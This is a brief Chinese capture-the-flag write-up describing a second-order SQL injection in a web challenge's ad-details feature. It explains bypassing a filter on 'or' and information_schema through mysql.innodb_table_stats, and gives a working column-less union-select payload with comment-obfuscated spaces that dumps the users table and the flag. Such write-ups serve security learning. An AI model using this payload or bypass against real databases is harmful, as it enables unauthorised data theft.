刚打开题目以为是xss
    image.png
    看了wp才知道还是sql二次注入。
    点击广告详情后,会出现二次注入漏洞。
    image.png
    并且还有过滤,但是过滤了不多,最麻烦的就是过滤掉了or,相当于间接过滤掉information_schema。
    绕过information_schema有几种方法,可以使用sys.schema_auto_increment_columnsmysql.innodb_table_stats,但是经过测试发现第一个会提示没有这个表,而第二个正确跑出来表名:users,ads
    得到表名后想办法得到列名,这里使用无列名注入方式:

    1. union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)x),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

    直接得到flag。
    image.png